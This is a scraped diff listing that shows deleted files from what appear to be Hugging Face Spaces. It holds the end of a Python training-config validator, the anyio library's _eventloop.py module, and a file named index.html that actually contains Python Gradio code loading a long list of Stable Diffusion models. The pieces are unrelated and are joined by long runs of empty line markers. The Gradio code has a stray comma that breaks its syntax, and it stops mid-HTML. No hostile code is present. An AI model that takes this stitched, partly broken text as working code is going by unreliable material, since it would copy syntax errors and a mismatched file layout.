361 |
-
)
|
362 |
-
# add arguments for random seed
|
363 |
-
validator.add_argument(
|
364 |
-
"seed",
|
365 |
-
type=int,
|
366 |
-
help="Random seed.",
|
367 |
-
)
|
368 |
-
# add arguments for output directory
|
369 |
-
validator.add_argument(
|
370 |
-
"output_dir",
|
371 |
-
type=str,
|
372 |
-
help="Output directory to save checkpoints and logs.",
|
373 |
-
)
|
374 |
-
# add arguments for whether only use evaluation
|
375 |
-
validator.add_argument(
|
376 |
-
"evaluate",
|
377 |
-
help="Whether to only evaluate the model. If true, training will not be performed.",
|
378 |
-
)
|
379 |
-
# add arguments for splits used for training, e.g. ["train", "val"]
|
380 |
-
validator.add_argument(
|
381 |
-
"train_splits",
|
382 |
-
type=list,
|
383 |
-
help="Splits to use for training.",
|
384 |
-
)
|
385 |
-
# add arguments for splits used for validation, e.g. ["val"]
|
386 |
-
validator.add_argument(
|
387 |
-
"valid_splits",
|
388 |
-
type=list,
|
389 |
-
help="Splits to use for validation. If not provided, will skip the validation.",
|
390 |
-
)
|
391 |
-
# add arguments for splits used for testing, e.g. ["test"]
|
392 |
-
validator.add_argument(
|
393 |
-
"test_splits",
|
394 |
-
type=list,
|
395 |
-
help="Splits to use for testing. If not provided, will skip the testing.",
|
396 |
-
)
|
397 |
-
# add arguments for accumulating gradient for iterations
|
398 |
-
validator.add_argument(
|
399 |
-
"accum_grad_iters",
|
400 |
-
type=int,
|
401 |
-
help="Number of iterations to accumulate gradient for.",
|
402 |
-
)
|
403 |
-
|
404 |
-
# ====== distributed training ======
|
405 |
-
validator.add_argument(
|
406 |
-
"device",
|
407 |
-
type=str,
|
408 |
-
choices=["cpu", "cuda"],
|
409 |
-
help="Device to use. Support 'cuda' or 'cpu' as for now.",
|
410 |
-
)
|
411 |
-
validator.add_argument(
|
412 |
-
"world_size",
|
413 |
-
type=int,
|
414 |
-
help="Number of processes participating in the job.",
|
415 |
-
)
|
416 |
-
validator.add_argument("dist_url", type=str)
|
417 |
-
validator.add_argument("distributed", type=bool)
|
418 |
-
# add arguments to opt using distributed sampler during evaluation or not
|
419 |
-
validator.add_argument(
|
420 |
-
"use_dist_eval_sampler",
|
421 |
-
type=bool,
|
422 |
-
help="Whether to use distributed sampler during evaluation or not.",
|
423 |
-
)
|
424 |
-
|
425 |
-
# ====== task specific ======
|
426 |
-
# generation task specific arguments
|
427 |
-
# add arguments for maximal length of text output
|
428 |
-
validator.add_argument(
|
429 |
-
"max_len",
|
430 |
-
type=int,
|
431 |
-
help="Maximal length of text output.",
|
432 |
-
)
|
433 |
-
# add arguments for minimal length of text output
|
434 |
-
validator.add_argument(
|
435 |
-
"min_len",
|
436 |
-
type=int,
|
437 |
-
help="Minimal length of text output.",
|
438 |
-
)
|
439 |
-
# add arguments number of beams
|
440 |
-
validator.add_argument(
|
441 |
-
"num_beams",
|
442 |
-
type=int,
|
443 |
-
help="Number of beams used for beam search.",
|
444 |
-
)
|
445 |
-
|
446 |
-
# vqa task specific arguments
|
447 |
-
# add arguments for number of answer candidates
|
448 |
-
validator.add_argument(
|
449 |
-
"num_ans_candidates",
|
450 |
-
type=int,
|
451 |
-
help="""For ALBEF and BLIP, these models first rank answers according to likelihood to select answer candidates.""",
|
452 |
-
)
|
453 |
-
# add arguments for inference method
|
454 |
-
validator.add_argument(
|
455 |
-
"inference_method",
|
456 |
-
type=str,
|
457 |
-
choices=["genearte", "rank"],
|
458 |
-
help="""Inference method to use for question answering. If rank, requires a answer list.""",
|
459 |
-
)
|
460 |
-
|
461 |
-
# ====== model specific ======
|
462 |
-
validator.add_argument(
|
463 |
-
"k_test",
|
464 |
-
type=int,
|
465 |
-
help="Number of top k most similar samples from ITC/VTC selection to be tested.",
|
466 |
-
)
|
467 |
-
|
468 |
-
return validator
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/_core/_eventloop.py
DELETED
@@ -1,153 +0,0 @@
|
|
1 |
-
from __future__ import annotations
|
2 |
-
|
3 |
-
import math
|
4 |
-
import sys
|
5 |
-
import threading
|
6 |
-
from contextlib import contextmanager
|
7 |
-
from importlib import import_module
|
8 |
-
from typing import (
|
9 |
-
Any,
|
10 |
-
Awaitable,
|
11 |
-
Callable,
|
12 |
-
Generator,
|
13 |
-
TypeVar,
|
14 |
-
)
|
15 |
-
|
16 |
-
import sniffio
|
17 |
-
|
18 |
-
# This must be updated when new backends are introduced
|
19 |
-
from ._compat import DeprecatedAwaitableFloat
|
20 |
-
|
21 |
-
BACKENDS = "asyncio", "trio"
|
22 |
-
|
23 |
-
T_Retval = TypeVar("T_Retval")
|
24 |
-
threadlocals = threading.local()
|
25 |
-
|
26 |
-
|
27 |
-
def run(
|
28 |
-
func: Callable[..., Awaitable[T_Retval]],
|
29 |
-
*args: object,
|
30 |
-
backend: str = "asyncio",
|
31 |
-
backend_options: dict[str, Any] | None = None,
|
32 |
-
) -> T_Retval:
|
33 |
-
"""
|
34 |
-
Run the given coroutine function in an asynchronous event loop.
|
35 |
-
|
36 |
-
The current thread must not be already running an event loop.
|
37 |
-
|
38 |
-
:param func: a coroutine function
|
39 |
-
:param args: positional arguments to ``func``
|
40 |
-
:param backend: name of the asynchronous event loop implementation – currently either
|
41 |
-
``asyncio`` or ``trio``
|
42 |
-
:param backend_options: keyword arguments to call the backend ``run()`` implementation with
|
43 |
-
(documented :ref:`here <backend options>`)
|
44 |
-
:return: the return value of the coroutine function
|
45 |
-
:raises RuntimeError: if an asynchronous event loop is already running in this thread
|
46 |
-
:raises LookupError: if the named backend is not found
|
47 |
-
|
48 |
-
"""
|
49 |
-
try:
|
50 |
-
asynclib_name = sniffio.current_async_library()
|
51 |
-
except sniffio.AsyncLibraryNotFoundError:
|
52 |
-
pass
|
53 |
-
else:
|
54 |
-
raise RuntimeError(f"Already running {asynclib_name} in this thread")
|
55 |
-
|
56 |
-
try:
|
57 |
-
asynclib = import_module(f"..._backends._{backend}", package=__name__)
|
58 |
-
except ImportError as exc:
|
59 |
-
raise LookupError(f"No such backend: {backend}") from exc
|
60 |
-
|
61 |
-
token = None
|
62 |
-
if sniffio.current_async_library_cvar.get(None) is None:
|
63 |
-
# Since we're in control of the event loop, we can cache the name of the async library
|
64 |
-
token = sniffio.current_async_library_cvar.set(backend)
|
65 |
-
|
66 |
-
try:
|
67 |
-
backend_options = backend_options or {}
|
68 |
-
return asynclib.run(func, *args, **backend_options)
|
69 |
-
finally:
|
70 |
-
if token:
|
71 |
-
sniffio.current_async_library_cvar.reset(token)
|
72 |
-
|
73 |
-
|
74 |
-
async def sleep(delay: float) -> None:
|
75 |
-
"""
|
76 |
-
Pause the current task for the specified duration.
|
77 |
-
|
78 |
-
:param delay: the duration, in seconds
|
79 |
-
|
80 |
-
"""
|
81 |
-
return await get_asynclib().sleep(delay)
|
82 |
-
|
83 |
-
|
84 |
-
async def sleep_forever() -> None:
|
85 |
-
"""
|
86 |
-
Pause the current task until it's cancelled.
|
87 |
-
|
88 |
-
This is a shortcut for ``sleep(math.inf)``.
|
89 |
-
|
90 |
-
.. versionadded:: 3.1
|
91 |
-
|
92 |
-
"""
|
93 |
-
await sleep(math.inf)
|
94 |
-
|
95 |
-
|
96 |
-
async def sleep_until(deadline: float) -> None:
|
97 |
-
"""
|
98 |
-
Pause the current task until the given time.
|
99 |
-
|
100 |
-
:param deadline: the absolute time to wake up at (according to the internal monotonic clock of
|
101 |
-
the event loop)
|
102 |
-
|
103 |
-
.. versionadded:: 3.1
|
104 |
-
|
105 |
-
"""
|
106 |
-
now = current_time()
|
107 |
-
await sleep(max(deadline - now, 0))
|
108 |
-
|
109 |
-
|
110 |
-
def current_time() -> DeprecatedAwaitableFloat:
|
111 |
-
"""
|
112 |
-
Return the current value of the event loop's internal clock.
|
113 |
-
|
114 |
-
:return: the clock value (seconds)
|
115 |
-
|
116 |
-
"""
|
117 |
-
return DeprecatedAwaitableFloat(get_asynclib().current_time(), current_time)
|
118 |
-
|
119 |
-
|
120 |
-
def get_all_backends() -> tuple[str, ...]:
|
121 |
-
"""Return a tuple of the names of all built-in backends."""
|
122 |
-
return BACKENDS
|
123 |
-
|
124 |
-
|
125 |
-
def get_cancelled_exc_class() -> type[BaseException]:
|
126 |
-
"""Return the current async library's cancellation exception class."""
|
127 |
-
return get_asynclib().CancelledError
|
128 |
-
|
129 |
-
|
130 |
-
#
|
131 |
-
# Private API
|
132 |
-
#
|
133 |
-
|
134 |
-
|
135 |
-
@contextmanager
|
136 |
-
def claim_worker_thread(backend: str) -> Generator[Any, None, None]:
|
137 |
-
module = sys.modules["anyio._backends._" + backend]
|
138 |
-
threadlocals.current_async_module = module
|
139 |
-
try:
|
140 |
-
yield
|
141 |
-
finally:
|
142 |
-
del threadlocals.current_async_module
|
143 |
-
|
144 |
-
|
145 |
-
def get_asynclib(asynclib_name: str | None = None) -> Any:
|
146 |
-
if asynclib_name is None:
|
147 |
-
asynclib_name = sniffio.current_async_library()
|
148 |
-
|
149 |
-
modulename = "anyio._backends._" + asynclib_name
|
150 |
-
try:
|
151 |
-
return sys.modules[modulename]
|
152 |
-
except KeyError:
|
153 |
-
return import_module(modulename)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Dagfinn1962/stablediffusion-articlera/index.html
DELETED
@@ -1,271 +0,0 @@
|
|
1 |
-
import gradio as gr
|
2 |
-
import os
|
3 |
-
import sys
|
4 |
-
from pathlib import Path
|
5 |
-
|
6 |
-
models = [
|
7 |
-
{"name": "Deliberate", "url": "Masagin/Deliberate"},
|
8 |
-
{"name": "Dreamlike Anime", "url": "dreamlike-art/dreamlike-anime-1.0"},
|
9 |
-
{"name": "Dreamlike Diffusion", "url": "dreamlike-art/dreamlike-diffusion-1.0"},
|
10 |
-
{"name": "Dreamlike Photoreal", "url": "dreamlike-art/dreamlike-photoreal-2.0"},
|
11 |
-
{"name": "Dreamshaper", "url": "Lykon/DreamShaper"},
|
12 |
-
|
13 |
-
{"name": "Never Ending Dream 2", "url": "luongphamit/NeverEnding-Dream2"},
|
14 |
-
{"name": "Protogen X 5.8", "url": "darkstorm2150/Protogen_x5.8_Official_Release"},
|
15 |
-
{"name": "❤ ART MODELS ==========", "url": "dreamlike-art/dreamlike-diffusion-1.0"},
|
16 |
-
{"name": "Alice in Diffusion Land", "url": "Guizmus/SDArt_AliceInDiffusionLand"},
|
17 |
-
{"name": "Alt Clip", "url": "BAAI/AltCLIP"},
|
18 |
-
{"name": "Anything Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"},
|
19 |
-
{"name": "Chaos and Order", "url": "Guizmus/SDArt_ChaosAndOrder768"},
|
20 |
-
{"name": "Chilloutclara", "url": "Fred99774/chilloutvlara"},
|
21 |
-
{"name": "Comic Diffusion", "url": "ogkalu/Comic-Diffusion"},
|
22 |
-
{"name": "Cosmic Horros 768", "url": "Guizmus/SDArt_cosmichorrors768"},
|
23 |
-
{"name": "Cosmic Horros", "url": "Guizmus/SDArt_cosmichorrors"},
|
24 |
-
{"name": "DGSpitzer", "url": "DGSpitzer/DGSpitzer-Art-Diffusion"},
|
25 |
-
{"name": "Dungeons and Diffusion", "url": "0xJustin/Dungeons-and-Diffusion"},
|
26 |
-
{"name": "Elden Ring", "url": "nitrosocke/elden-ring-diffusion"},
|
27 |
-
{"name": "Epic Diffusion 1.1", "url": "johnslegers/epic-diffusion-v1.1"},
|
28 |
-
{"name": "Epic Diffusion", "url": "johnslegers/epic-diffusion"},
|
29 |
-
{"name": "EpicMix Realism", "url": "Duskfallcrew/EpicMix_Realism"},
|
30 |
-
{"name": "Fantasy Mix", "url": "theintuitiveye/FantasyMix"},
|
31 |
-
{"name": "Girl New 1", "url": "Fred99774/girlnew1"},
|
32 |
-
{"name": "Lit 6B", "url": "hakurei/lit-6B"},
|
33 |
-
{"name": "Luna Diffusion", "url": "proximasanfinetuning/luna-diffusion"},
|
34 |
-
{"name": "Midjourney 4.0", "url": "flax/midjourney-v4-diffusion"},
|
35 |
-
{"name": "Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"},
|
36 |
-
{"name": "Mo-Di Diffusion", "url": "nitrosocke/mo-di-diffusion"},
|
37 |
-
{"name": "Nitro Diffusion", "url": "nitrosocke/Nitro-Diffusion"},
|
38 |
-
{"name": "Openjourney V2", "url": "prompthero/openjourney-v2"},
|
39 |
-
{"name": "Openjourney", "url": "prompthero/openjourney"},
|
40 |
-
{"name": "Seek Art Mega", "url": "coreco/seek.art_MEGA"},
|
41 |
-
{"name": "Something", "url": "Guizmus/SDArt_something"},
|
42 |
-
{"name": "Spider Verse diffusion", "url": "nitrosocke/spider-verse-diffusion"},
|
43 |
-
{"name": "Vintedois 1.0", "url": "22h/vintedois-diffusion-v0-1"},
|
44 |
-
{"name": "Vintedois 2.0", "url": "22h/vintedois-diffusion-v0-2"},
|
45 |
-
{"name": "❤ ART STYLES ==========", "url": "joachimsallstrom/Double-Exposure-Diffusion"},
|
46 |
-
{"name": "Balloon Art", "url": "Fictiverse/Stable_Diffusion_BalloonArt_Model"},
|
47 |
-
{"name": "Double Exposure Diffusion", "url": "joachimsallstrom/Double-Exposure-Diffusion"},
|
48 |
-
{"name": "Fluid Art", "url": "Fictiverse/Stable_Diffusion_FluidArt_Model"},
|
49 |
-
{"name": "GTA5 Artwork Diffusion", "url": "ItsJayQz/GTA5_Artwork_Diffusion"},
|
50 |
-
{"name": "Marvel WhatIf Diffusion", "url": "ItsJayQz/Marvel_WhatIf_Diffusion"},
|
51 |
-
{"name": "Naruto Diffuser", "url": "lambdalabs/sd-naruto-diffusers"},
|
52 |
-
{"name": "Papercut", "url": "Fictiverse/Stable_Diffusion_PaperCut_Model"},
|
53 |
-
{"name": "Pokemon Diffuser", "url": "lambdalabs/sd-pokemon-diffusers"},
|
54 |
-
{"name": "Synthwave Punk 2", "url": "ItsJayQz/SynthwavePunk-v2"},
|
55 |
-
{"name": "Valorant Diffusion", "url": "ItsJayQz/Valorant_Diffusion"},
|
56 |
-
{"name": "Van Gogh Diffusion", "url": "dallinmackay/Van-Gogh-diffusion"},
|
57 |
-
{"name": "Vectorartz Diffusion", "url": "coder119/Vectorartz_Diffusion"},
|
58 |
-
{"name": "VoxelArt", "url": "Fictiverse/Stable_Diffusion_VoxelArt_Model"},
|
59 |
-
{"name": "❤ ANIME MODELS ==========", "url": "dreamlike-art/dreamlike-anime-1.0"},
|
60 |
-
{"name": "7 Pa", "url": "AIARTCHAN/7pa"},
|
61 |
-
{"name": "A Certain Model", "url": "JosephusCheung/ACertainModel"},
|
62 |
-
{"name": "A Certain Thing", "url": "JosephusCheung/ACertainThing"},
|
63 |
-
{"name": "A Certainity", "url": "JosephusCheung/ACertainty"},
|
64 |
-
{"name": "Abyss Hell Hero", "url": "AIARTCHAN/AbyssHellHero"},
|
65 |
-
{"name": "Abyss Maple 3", "url": "AIARTCHAN/AbyssMapleVer3"},
|
66 |
-
{"name": "Abyss Orange Mix 2", "url": "WarriorMama777/AbyssOrangeMix2"},
|
67 |
-
{"name": "Abyss Orange Mix", "url": "WarriorMama777/AbyssOrangeMix"},
|
68 |
-
{"name": "AbyssHell 3", "url": "AIARTCHAN/AbyssHellVer3"},
|
69 |
-
{"name": "All 526 Animated", "url": "stablediffusionapi/all-526-animated"},
|
70 |
-
{"name": "Anidosmix 3", "url": "AIARTCHAN/anidosmixV2"},
|
71 |
-
{"name": "Anime Kawai Diffusion", "url": "Ojimi/anime-kawai-diffusion"},
|
72 |
-
{"name": "Anireal 3D V2", "url": "circulus/sd-anireal-3d-v2"},
|
73 |
-
{"name": "AnyLORA", "url": "kubanemil/AnyLORA"},
|
74 |
-
{"name": "Anything 2.1", "url": "swl-models/anything-v2.1"},
|
75 |
-
{"name": "Anything 3.0 Light", "url": "mm00/anything-v3.0-light"},
|
76 |
-
{"name": "Anything 3.0", "url": "Linaqruf/anything-v3.0"},
|
77 |
-
{"name": "Anything 3.1", "url": "cag/anything-v3-1"},
|
78 |
-
{"name": "Anything 3X", "url": "iZELX1/Anything-V3-X"},
|
79 |
-
{"name": "Anything 5.0", "url": "stablediffusionapi/anything-v5"},
|
80 |
-
{"name": "Anything Else 4", "url": "stablediffusionapi/anythingelse-v4"},
|
81 |
-
{"name": "Anything Else 5", "url": "stablediffusionapi/anything-v5"},
|
82 |
-
{"name": "Arcane Diffusion", "url": "nitrosocke/Arcane-Diffusion"},
|
83 |
-
{"name": "Archer Diffusion", "url": "nitrosocke/archer-diffusion"},
|
84 |
-
{"name": "Asian Mix", "url": "D1b4l4p/AsianMix"},
|
85 |
-
{"name": "Blood Orange Mix", "url": "WarriorMama777/BloodOrangeMix"},
|
86 |
-
{"name": "CamelliaMix 2.5D","url": "stablediffusionapi/camelliamix25d"},
|
87 |
-
{"name": "CamelliaMix Line","url": "stablediffusionapi/camelliamixline"},
|
88 |
-
,{"name": "Cetusmix", "url": "stablediffusionapi/cetusmix"},
|
89 |
-
{"name": "Chik Mix", "url": "stablediffusionapi/chikmix"},
|
90 |
-
{"name": "Chikmix", "url": "stablediffusionapi/chikmix"},
|
91 |
-
{"name": "Chillout App Factory","url": "stablediffusionapi/chillout-app-factory"},
|
92 |
-
{"name": "Classic Anime", "url": "nitrosocke/classic-anim-diffusion"},
|
93 |
-
{"name": "Cool Japan Diffusion 2.1.2", "url": "aipicasso/cool-japan-diffusion-2-1-2"},
|
94 |
-
{"name": "Cosmic Babes", "url": "stablediffusionapi/cosmic-babes"},
|
95 |
-
{"name": "Counterfeit 1.0", "url": "gsdf/counterfeit-v1.0"},
|
96 |
-
{"name": "Counterfeit 2", "url": "gsdf/Counterfeit-V2.0"},
|
97 |
-
{"name": "Counterfeit 2.0", "url": "gsdf/Counterfeit-V2.0"},
|
98 |
-
{"name": "Counterfeit 3.0", "url": "stablediffusionapi/counterfeit-v30"},
|
99 |
-
{"name": "CyberPunk Anime", "url": "DGSpitzer/Cyberpunk-Anime-Diffusion"},
|
100 |
-
{"name": "Dark Sushi Mix", "url": "stablediffusionapi/dark-sushi-mix"},
|
101 |
-
{"name": "Dash Sushi 25d", "url": "stablediffusionapi/dark-sushi-25d"},
|
102 |
-
{"name": "DucHaiten Anime", "url": "DucHaiten/DucHaitenAnime"},
|
103 |
-
{"name": "Eerie Orange Mix", "url": "WarriorMama777/EerieOrangeMix"},
|
104 |
-
{"name": "Eimis Anime Diffusion", "url": "eimiss/EimisAnimeDiffusion_1.0v"},
|
105 |
-
{"name": "Ghibli Diffusion", "url": "nitrosocke/Ghibli-Diffusion"},
|
106 |
-
{"name": "GrapeFruit", "url": "iZELX1/Grapefruit"},
|
107 |
-
{"name": "GuoFeng 3", "url": "xiaolxl/GuoFeng3"},
|
108 |
-
{"name": "Icomix 2", "url": "stablediffusionapi/icomix-2"},
|
109 |
-
{"name": "InkPunk Diffusion", "url": "Envvi/Inkpunk-Diffusion"},
|
110 |
-
{"name": "Mama Orange Mixs", "url": "WarriorMama777/OrangeMixs"},
|
111 |
-
{"name": "Mashuu Diffusion", "url": "andite/mashuu-diffusion"},
|
112 |
-
{"name": "Openjourney 4", "url": "prompthero/openjourney-v4"},
|
113 |
-
{"name": "OpenNiji", "url": "Korakoe/OpenNiji"},
|
114 |
-
{"name": "Pastel Mix", "url": "andite/pastel-mix"},
|
115 |
-
{"name": "Picasso Diffusion 1.1", "url": "aipicasso/picasso-diffusion-1-1"},
|
116 |
-
{"name": "Piromizu Diffusion", "url": "andite/piromizu-diffusion"},
|
117 |
-
{"name": "Protogen 2.2", "url": "darkstorm2150/Protogen_v2.2_Official_Release"},
|
118 |
-
{"name": "Protogen Infinity", "url": "darkstorm2150/Protogen_Infinity_Official_Release"},
|
119 |
-
{"name": "Protogen X 3.4", "url": "darkstorm2150/Protogen_x3.4_Official_Release"},
|
120 |
-
{"name": "Rev Anim", "url": "stablediffusionapi/rev-anim"},
|
121 |
-
{"name": "Rev Animated", "url": "coreml/coreml-ReV-Animated"},
|
122 |
-
{"name": "Rev Animated", "url": "LottePeisch/RevAnimated-Diffusers"},
|
123 |
-
{"name": "Something V 2.2","url": "NoCrypt/SomethingV2_2"},
|
124 |
-
{"name": "Something V2","url": "NoCrypt/SomethingV2"},
|
125 |
-
{"name": "Three Delicacy", "url": "stablediffusionapi/three-delicacy"},
|
126 |
-
{"name": "Three Delicacy wonto", "url": "stablediffusionapi/three-delicacy-wonto"},
|
127 |
-
{"name": "TMND mix", "url": "stablediffusionapi/tmnd-mix"},
|
128 |
-
{"name": "Waifu Diffusion", "url": "hakurei/waifu-diffusion"},
|
129 |
-
{"name": "❤ REALISTIC PHOTO MODELS ==========", "url": "dreamlike-art/dreamlike-photoreal-2.0"},
|
130 |
-
{"name": "AmiIReal", "url": "stablediffusionapi/amireal"},
|
131 |
-
{"name": "Analog Diffusion", "url": "wavymulder/Analog-Diffusion"},
|
132 |
-
{"name": "Circulus 2.8", "url": "circulus/sd-photoreal-v2.8"},
|
133 |
-
{"name": "UltraSkin", "url": "VegaKH/Ultraskin"},
|
134 |
-
{"name": "Wavyfusion", "url": "wavymulder/wavyfusion"},
|
135 |
-
{"name": "❤ SEMI-REALISTIC MODELS ==========", "url": "stablediffusionapi/all-526"},
|
136 |
-
{"name": "All 526", "url": "stablediffusionapi/all-526"},
|
137 |
-
{"name": "All 526 animated", "url": "stablediffusionapi/all-526-animated"},
|
138 |
-
{"name": "Circulus Semi Real 2", "url": "circulus/sd-photoreal-semi-v2"},
|
139 |
-
{"name": "Semi Real Mix", "url": "robotjung/SemiRealMix"},
|
140 |
-
{"name": "SpyBG", "url": "stablediffusionapi/spybg"},
|
141 |
-
{"name": "❤ STABLE DIFFUSION MODELS ==========", "url": "stabilityai/stable-diffusion-2-1"},
|
142 |
-
{"name": "Stable Diffusion 1.4","url": "CompVis/stable-diffusion-v1-4"},
|
143 |
-
{"name": "Stable Diffusion 1.5","url": "runwayml/stable-diffusion-v1-5"},
|
144 |
-
{"name": "Stable Diffusion 2.1","url": "stabilityai/stable-diffusion-2-1"},
|
145 |
-
{"name": "Stable Diffusion 2.1 Base","url": "stabilityai/stable-diffusion-2-1-base"},
|
146 |
-
{"name": "Stable Diffusion 2.1 Unclip","url": "stabilityai/stable-diffusion-2-1-unclip"},
|
147 |
-
{"name": "❤ SCI FI MODELS ==========", "url": "nitrosocke/Future-Diffusion"},
|
148 |
-
{"name": "Future Diffusion", "url": "nitrosocke/Future-Diffusion"},
|
149 |
-
{"name": "JWST Deep Space Diffusion", "url": "dallinmackay/JWST-Deep-Space-diffusion"},
|
150 |
-
{"name": "Robo Diffusion 3 Base", "url": "nousr/robo-diffusion-2-base"},
|
151 |
-
{"name": "Robo Diffusion", "url": "nousr/robo-diffusion"},
|
152 |
-
{"name": "Tron Legacy Diffusion", "url": "dallinmackay/Tron-Legacy-diffusion"},
|
153 |
-
{"name": "❤ 3D ART MODELS ==========", "url": "DucHaiten/DucHaitenAIart"},
|
154 |
-
{"name": "DucHaiten Art", "url": "DucHaiten/DucHaitenAIart"},
|
155 |
-
{"name": "DucHaiten ClassicAnime", "url": "DucHaiten/DH_ClassicAnime"},
|
156 |
-
{"name": "DucHaiten DreamWorld", "url": "DucHaiten/DucHaitenDreamWorld"},
|
157 |
-
{"name": "DucHaiten Journey", "url": "DucHaiten/DucHaitenJourney"},
|
158 |
-
{"name": "DucHaiten StyleLikeMe", "url": "DucHaiten/DucHaiten-StyleLikeMe"},
|
159 |
-
{"name": "DucHaiten SuperCute", "url": "DucHaiten/DucHaitenSuperCute"},
|
160 |
-
{"name": "Redshift Diffusion 768", "url": "nitrosocke/redshift-diffusion-768"},
|
161 |
-
{"name": "Redshift Diffusion", "url": "nitrosocke/redshift-diffusion"},
|
162 |
-
]
|
163 |
-
|
164 |
-
current_model = models[0]
|
165 |
-
|
166 |
-
text_gen = gr.Interface.load("spaces/Omnibus/MagicPrompt-Stable-Diffusion_link")
|
167 |
-
|
168 |
-
models2 = []
|
169 |
-
for model in models:
|
170 |
-
model_url = f"models/{model['url']}"
|
171 |
-
loaded_model = gr.Interface.load(model_url, live=True, preprocess=True)
|
172 |
-
models2.append(loaded_model)
|
173 |
-
|
174 |
-
|
175 |
-
def text_it(inputs, text_gen=text_gen):
|
176 |
-
return text_gen(inputs)
|
177 |
-
|
178 |
-
|
179 |
-
def set_model(current_model_index):
|
180 |
-
global current_model
|
181 |
-
current_model = models[current_model_index]
|
182 |
-
return gr.update(label=f"{current_model['name']}")
|
183 |
-
|
184 |
-
|
185 |
-
def send_it(inputs, model_choice):
|
186 |
-
proc = models2[model_choice]
|
187 |
-
return proc(inputs)
|
188 |
-
|
189 |
-
|
190 |
-
css = """"""
|
191 |
-
|
192 |
-
with gr.Blocks(css=css) as myface:
|
193 |
-
gr.HTML(
|
194 |
-
"""<!DOCTYPE html>
|
195 |
-
<html lang="en">
|
196 |
-
<head>
|
197 |
-
